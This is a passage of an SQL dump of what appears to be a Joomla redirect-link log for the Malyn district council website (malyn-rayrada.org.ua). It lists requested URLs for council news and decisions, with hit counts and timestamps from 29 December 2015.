00:00:00',301),(23165,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:23:24','0000-00-00 00:00:00',301),(23166,'http://www.malyn-rayrada.org.ua/index.php?catid=21&id=27:2010-06-07-11-05-24&Itemid=47&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:25:22','0000-00-00 00:00:00',301),(23167,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=948:--------------2012-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:26:14','0000-00-00 00:00:00',301),(23168,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=en&layout=blog&limitstart=30&option=com_content&view=category','','','',1,0,'2015-12-29 06:27:45','0000-00-00 00:00:00',301),(23169,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1039:---------------l-r&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 06:28:54','0000-00-00 00:00:00',301),(23170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=347:2011-06-15-12-33-18&catid=34&Itemid=68&lang=uk','','','',1,0,'2015-12-29 06:30:28','0000-00-00 00:00:00',301),(23171,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=408:-2011-&Itemid=72&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 06:31:55','0000-00-00 00:00:00',301),(23172,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1187:2014-01-28-09-43-51&Itemid=97&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:32:43','0000-00-00 00:00:00',301),(23173,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 06:33:58','0000-00-00 00:00:00',301),(23174,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1093:------------2017-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:35:20','0000-00-00 00:00:00',301),(23175,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 06:37:05','0000-00-00 00:00:00',301),(23176,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=805:2012-10-30-13-35-53&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:38:30','0000-00-00 00:00:00',301),(23177,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1284:2014-04-17-13-00-18&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 06:39:02','0000-00-00 00:00:00',301),(23178,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=822:----------2012--2013-----------------l-r&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:42:48','0000-00-00 00:00:00',301),(23179,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=430:14-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:43:45','0000-00-00 00:00:00',301),(23180,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1034:2013-06-23-15-11-25&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:44:43','0000-00-00 00:00:00',301),(23181,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=739:2012-07-23-12-44-57&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:48:00','0000-00-00 00:00:00',301),(23182,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:49:31','0000-00-00 00:00:00',301),(23183,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=836:-6732012&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:51:56','0000-00-00 00:00:00',301),(23184,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/dsc00823-88','','','',1,0,'2015-12-29 06:52:39','0000-00-00 00:00:00',301),(23185,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-62','','','',1,0,'2015-12-29 06:52:40','0000-00-00 00:00:00',301),(23186,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-73','','','',1,0,'2015-12-29 06:52:42','0000-00-00 00:00:00',301),(23187,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/zim-12-2-146','','','',2,0,'2015-12-29 06:52:44','0000-00-00 00:00:00',301),(23188,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0770-1-94','','','',1,0,'2015-12-29 06:52:46','0000-00-00 00:00:00',301),(23189,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0844-5-98','','','',1,0,'2015-12-29 06:52:48','0000-00-00 00:00:00',301),(23190,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1076-20-112','','','',1,0,'2015-12-29 06:52:49','0000-00-00 00:00:00',301),(23191,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=760:-qq-24-2012-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:52:55','0000-00-00 00:00:00',301),(23192,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1046:-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 06:54:25','0000-00-00 00:00:00',301),(23193,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-11-2013-&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:54:48','0000-00-00 00:00:00',301),(23194,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1191:------2014-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:55:14','0000-00-00 00:00:00',301),(23195,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=314:2011-05-20-13-01-00&catid=33&Itemid=66&lang=uk','','','',1,0,'2015-12-29 06:55:31','0000-00-00 00:00:00',301),(23196,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=707:--------231--280312--l-------2012-r&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 06:56:35','0000-00-00 00:00:00',301),(23197,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=735:2012-07-18-13-32-43&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:57:35','0000-00-00 00:00:00',301),(23198,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=521:-2012-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 06:58:28','0000-00-00 00:00:00',301),(23199,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1155:2013-12-07-15-56-12&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 06:59:23','0000-00-00 00:00:00',301),(23200,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1201:2014-01-31-07-43-11&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:00:05','0000-00-00 00:00:00',301),(23201,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:00:30','0000-00-00 00:00:00',301),(23202,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=681:16-13-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:01:30','0000-00-00 00:00:00',301),(23203,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=770:-2012-2015-&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:02:27','0000-00-00 00:00:00',301),(23204,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1143:2013-11-26-13-23-37&Itemid=95&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:03:23','0000-00-00 00:00:00',301),(23205,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 07:05:18','0000-00-00 00:00:00',301),(23206,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=640:2012-04-03-12-44-22&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:06:42','0000-00-00 00:00:00',301),(23207,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=545:2012-01-26-12-06-01&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 07:09:37','0000-00-00 00:00:00',301),(23208,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=689:2012-05-29-17-48-13&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:10:27','0000-00-00 00:00:00',301),(23209,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1078:-2007-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:11:26','0000-00-00 00:00:00',301),(23210,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1287:2014-04-23-06-49-34&Itemid=17&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:16:27','0000-00-00 00:00:00',301),(23211,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1070:2013-08-23-04-27-00&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:18:05','0000-00-00 00:00:00',301),(23212,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1140:80-1932-33-l-r&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 07:18:51','0000-00-00 00:00:00',301),(23213,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 07:21:25','0000-00-00 00:00:00',301),(23214,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:22:41','0000-00-00 00:00:00',301),(23215,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=747:2012-08-03-09-21-28&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:24:28','0000-00-00 00:00:00',301),(23216,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:29:22','0000-00-00 00:00:00',301),(23217,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=203:2010-12-15-14-10-45&Itemid=60&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:31:34','0000-00-00 00:00:00',301),(23218,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 07:32:29','0000-00-00 00:00:00',301),(23219,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=765:-qq&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:33:53','0000-00-00 00:00:00',301),(23220,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=596:2012-02-28-12-59-05&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:34:19','0000-00-00 00:00:00',301),(23221,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1082:-2012-2015-&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 07:35:16','0000-00-00 00:00:00',301),(23222,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:36:33','0000-00-00 00:00:00',301),(23223,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=272:-2010-&Itemid=62&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:36:54','0000-00-00 00:00:00',301),(23224,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:-qq&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:48:37','0000-00-00 00:00:00',301),(23225,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1291:2014-04-23-11-37-34&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:49:08','0000-00-00 00:00:00',301),(23226,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=908:2013-01-21-08-58-40&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:49:17','0000-00-00 00:00:00',301),(23227,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=793:2012-10-17-06-29-27&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:49:26','0000-00-00 00:00:00',301),(23228,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1047:2013-07-10-05-51-36&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:50:04','0000-00-00 00:00:00',301),(23229,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1171:2014-01-11-09-58-40&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:50:14','0000-00-00 00:00:00',301),(23230,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=465:-----l--r------2011-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:50:38','0000-00-00 00:00:00',301),(23231,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=190:2010-12-15-13-24-17&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 07:50:58','0000-00-00 00:00:00',301),(23232,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&Itemid=16&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 07:51:03','0000-00-00 00:00:00',301),(23233,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=938:---------------6612-------626-&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:51:22','0000-00-00 00:00:00',301),(23234,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=450:-l-2011-2013-r&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:51:39','0000-00-00 00:00:00',301),(23235,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1021:---l---r&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:52:08','0000-00-00 00:00:00',301),(23236,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=598:2012-02-29-14-13-44&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 07:52:15','0000-00-00 00:00:00',301),(23237,'http://www.malyn-rayrada.org.ua/index.php?catid=32&id=853:2012-12-11-13-39-46&Itemid=64&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:52:29','0000-00-00 00:00:00',301),(23238,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=505:2011-12-16-13-24-32&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:52:37','0000-00-00 00:00:00',301),(23239,'http://www.malyn-rayrada.org.ua/index.php?id=36&Itemid=70&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2015-12-29 07:52:47','0000-00-00 00:00:00',301),(23240,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1099:-l-r&Itemid=94&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:53:01','0000-00-00 00:00:00',301),(23241,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:53:29','0000-00-00 00:00:00',301),(23242,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=681:16-13-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:53:44','0000-00-00 00:00:00',301),(23243,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1039:-l-r&Itemid=92&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:53:51','0000-00-00 00:00:00',301),(23244,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=985:2013-04-12-09-53-08&Itemid=88&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 07:53:57','0000-00-00 00:00:00',301),(23245,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=983:2013-04-04-11-23-57&Itemid=88&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:54:22','0000-00-00 00:00:00',301),(23246,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=797:-6-16112010-5-&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:54:28','0000-00-00 00:00:00',301),(23247,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1164:2013-12-29-11-46-36&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 07:55:00','0000-00-00 00:00:00',301),(23248,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=327:2011-05-20-16-20-26&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 07:55:17','0000-00-00 00:00:00',301),(23249,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=742:-14-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 07:55:23','0000-00-00 00:00:00',301),(23250,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=828:-q-q&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 07:55:30','0000-00-00 00:00:00',301),(23251,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=348:2011-06-15-12-35-38&Itemid=68&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:55:37','0000-00-00 00:00:00',301),(23252,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:55:56','0000-00-00 00:00:00',301),(23253,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1343:2014-06-14-17-26-47&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 07:56:03','0000-00-00 00:00:00',301),(23254,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=444:2011-10-24-07-04-45&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 07:56:09','0000-00-00 00:00:00',301),(23255,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1024:-l-2011-2014-r-&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 07:56:15','0000-00-00 00:00:00',301),(23256,'http://www.malyn-rayrada.org.ua/index.php?id=7:2010-06-05-12-53-35&Itemid=12&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-29 07:56:29','0000-00-00 00:00:00',301),(23257,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 09:14:08','0000-00-00 00:00:00',301),(23258,'http://www.malyn-rayrada.org.ua/index.php/874-vidbulas-33-pozachergova-sesiya-rajonnoji-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 09:15:28','0000-00-00 00:00:00',301),(23259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=443:-2011-&catid=37:--21102011-&Itemid=72&lang=ru','','','',21,0,'2015-12-29 09:17:57','0000-00-00 00:00:00',301),(23260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=50:2010-06-16-14-17-25&catid=1:-14052010&Itemid=10&lang=en','','','',6,0,'2015-12-29 09:23:32','0000-00-00 00:00:00',301),(23262,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 10:07:31','0000-00-00 00:00:00',301),(23263,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1275:2014-04-10-13-24-47&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 10:07:50','0000-00-00 00:00:00',301),(23264,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=960:-19-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 10:07:52','0000-00-00 00:00:00',301),(23265,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1291-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-stanovlennya-mezh-lyubovitskoji-silskoji-radi-malinskogo-r','','','',1,0,'2015-12-29 10:14:01','0000-00-00 00:00:00',301),(23266,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33&layout=blog&Itemid=66&lang=ru&limitstart=20','','','',1,0,'2015-12-29 10:53:36','0000-00-00 00:00:00',301),(23267,'http://www.malyn-rayrada.org.ua/index.php/771-golova-oda-kizin-s-v-predstaviv-aktivu-rajonu-ta?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 11:27:50','0000-00-00 00:00:00',301),(23268,'http://www.malyn-rayrada.org.ua/index.php/633-informacija-shhodo-vnesennja-zmin-v-bjudzhet-2013?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 11:27:50','0000-00-00 00:00:00',301),(23269,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1285-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2016-rotsi','','','',20,0,'2015-12-29 11:37:04','0000-00-00 00:00:00',301),(23270,'http://www.malyn-rayrada.org.ua/index.php//images/stories/explore.gif','','','',1,0,'2015-12-29 13:24:15','0000-00-00 00:00:00',301),(23271,'http://www.malyn-rayrada.org.ua/index.php/539-malinska-rajonna-rada-shhiro-vitae-vas-iz-dnem?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 14:36:34','0000-00-00 00:00:00',301),(23272,'http://www.malyn-rayrada.org.ua/index.php/1185-problemu-potribno-virishuvati-spilno?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 15:04:17','0000-00-00 00:00:00',301),(23273,'http://www.malyn-rayrada.org.ua/index.php/1014-20-lyutogo-2015-roku-blagodijnij-kontsert-povertajsya-zhivim?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 15:04:18','0000-00-00 00:00:00',301),(23274,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1269-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',12,0,'2015-12-29 15:35:19','0000-00-00 00:00:00',301),(23275,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1284-pro-pilgovij-projizd-uchniv-ta-pedagogichnikh-pratsivnikiv-zakladiv-osviti-malinskogo-rajonu-na-2016-rik','','','',17,0,'2015-12-29 17:35:11','0000-00-00 00:00:00',301),(23276,'http://www.malyn-rayrada.org.ua/index.php/1037-pishov-iz-zhittya-tsvik-s-m?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 18:13:15','0000-00-00 00:00:00',301),(23277,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/2014-09-22-17-49-27','','','',13,0,'2015-12-29 18:39:54','0000-00-00 00:00:00',301),(23278,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/zam.jpg','','','',1,0,'2015-12-29 18:45:42','0000-00-00 00:00:00',301),(23279,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=621:-2012-&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 19:18:38','0000-00-00 00:00:00',301),(23280,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/827-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_7','','','',6,0,'2015-12-29 19:28:11','0000-00-00 00:00:00',301),(23281,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/831-pro-obrannja-zastupnika-golovi-rajonnoi-radi_2','','','',7,0,'2015-12-29 19:28:11','0000-00-00 00:00:00',301),(23282,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/834-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_3','','','',7,0,'2015-12-29 19:28:11','0000-00-00 00:00:00',301),(23283,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?page=3','','','',15,0,'2015-12-29 19:28:43','0000-00-00 00:00:00',301),(23284,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/13-2010-06-06-05-22-15','','','',8,0,'2015-12-29 19:28:46','0000-00-00 00:00:00',301),(23285,'http://malyn-rayrada.org.ua/index.php/250-z-peremogoju','','','',4,0,'2015-12-29 19:28:47','0000-00-00 00:00:00',301),(23286,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/914-pro-zatverdzhennya-rajonnoji-programi-polipshennya-medichnogo-obslugovuvannya-silskogo-naselennya-malinskogo-rajonu-na-2015-2019-roki','','','',1,0,'2015-12-29 19:29:21','0000-00-00 00:00:00',301),(23287,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1267-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-29 19:29:41','0000-00-00 00:00:00',301),(23288,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1285-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2016-rotsi','','','',5,0,'2015-12-29 19:29:42','0000-00-00 00:00:00',301),(23289,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1290-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-stanovlennya-mezh-malinivskoji-silskoji-radi-malinskogo-rajonu','','','',1,0,'2015-12-29 19:29:42','0000-00-00 00:00:00',301),(23290,'http://malyn-rayrada.org.ua/index.php/662-ogoloshennja_10','','','',7,0,'2015-12-29 19:29:48','0000-00-00 00:00:00',301),(23291,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/827-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_7?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-29 19:33:57','0000-00-00 00:00:00',301),(23292,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/828-pro-stan-zlochinnosti-na-teritorii-malinskogo_2','','','',7,0,'2015-12-29 19:33:57','0000-00-00 00:00:00',301),(23293,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/828-pro-stan-zlochinnosti-na-teritorii-malinskogo_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 19:33:57','0000-00-00 00:00:00',301),(23294,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/834-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-29 19:33:57','0000-00-00 00:00:00',301),(23295,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/690-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_24','','','',6,0,'2015-12-29 19:33:58','0000-00-00 00:00:00',301),(23296,'http://malyn-rayrada.org.ua/index.php/251-vitaemo-iz-svjatom','','','',4,0,'2015-12-29 19:34:33','0000-00-00 00:00:00',301),(23297,'http://malyn-rayrada.org.ua/index.php/309-vitaemo-z-dnem-peremogi_2','','','',4,0,'2015-12-29 19:34:34','0000-00-00 00:00:00',301),(23298,'http://malyn-rayrada.org.ua/index.php/310-zakinchilis-poshuki-v-rodini-volovenko-mogili','','','',4,0,'2015-12-29 19:34:35','0000-00-00 